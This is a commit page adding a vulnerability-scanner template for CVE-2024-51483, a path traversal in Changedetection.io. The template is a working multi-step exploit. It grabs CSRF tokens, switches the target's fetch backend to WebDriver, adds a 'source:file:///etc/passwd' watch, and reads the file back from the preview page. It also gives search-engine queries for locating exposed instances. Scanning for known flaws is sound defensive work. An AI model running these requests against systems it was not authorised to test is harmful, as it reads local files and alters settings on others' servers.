Merge pull request #11188 from projectdiscovery/CVE-2024-51483
Create CVE-2024-51483.yaml (Changedetection.io <= 0.47.4 Path Traversal)patch-14
commit
4937d1c91b
|
@ -0,0 +1,110 @@
|
|||
id: CVE-2024-51483
|
||||
|
||||
info:
|
||||
name: Changedetection.io <= 0.47.4 - Path Traversal
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: medium
|
||||
description: |
|
||||
changedetection.io is free, open source web page change detection software. Prior to version 0.47.5, when a WebDriver is used to fetch files, `source-file-///etc/passwd` can be used to retrieve local system files, where the more traditional `file-///etc/passwd` gets blocked. Version 0.47.5 fixes the issue.
|
||||
reference:
|
||||
- https://github.com/advisories/GHSA-cwgg-57xj-g77r
|
||||
- https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/model/Watch.py#L19
|
||||
- https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/processors/__init__.py#L35
|
||||
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-cwgg-57xj-g77r
|
||||
- https://github.com/user-attachments/files/17591630/CL-ChangeDetection.io.Path.Travsersal-311024-181039.pdf
|
||||
classification:
|
||||
cvss-score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
||||
cve-id: CVE-2024-51483
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00045
|
||||
epss-percentile: 0.16805
|
||||
cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 6
|
||||
vendor: changedetection
|
||||
product: changedetection
|
||||
shodan-query: http.title:"change detection"
|
||||
fofa-query: title="change detection"
|
||||
google-query: intitle:"change detection"
|
||||
tags: cve,cve2024,changedetection,lfi
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /settings HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="csrf_token" value="(.*)?"'
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
POST /settings HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
csrf_token={{csrf}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-rss_hide_muted_watches=y&application-pager_size=50&application-notification_urls=&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-base_url=&application-fetch_backend=html_webdriver&application-webdriver_delay=&requests-default_ua-html_requests=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F87.0.4280.66+Safari%2F537.36&requests-default_ua-html_webdriver=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&requests-extra_browsers-0-browser_name=&requests-extra_browsers-0-browser_connection_url=&requests-extra_browsers-1-browser_name=&requests-extra_browsers-1-browser_connection_url=&requests-extra_browsers-2-browser_name=&requests-extra_browsers-2-browser_connection_url=&requests-extra_browsers-3-browser_name=&requests-extra_browsers-3-browser_connection_url=&requests-extra_browsers-4-browser_name=&requests-extra_browsers-4-browser_connection_url=&save_button=Save
|
||||
|
||||
skip-variables-check: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf2
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="csrf_token" value="(.*)?"'
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
POST /form/add/quickwatch HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
csrf_token={{csrf2}}&url=source%3Afile%3A%2F%2Fetc%2Fpasswd&tags=&watch_submit_button=Watch&processor=text_json_diff
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==302"
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /?{{wait_for(9)}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: uuid
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '/etc/passwd"><\/a>\n.*?uuid=(.*?)"'
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /preview/{{uuid}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(body,'root:x:0')"
|
||||
- "contains(content_type,'text/html')"
|
||||
- 'status_code == 200'
|
||||
condition: and
|
Loading…
Reference in New Issue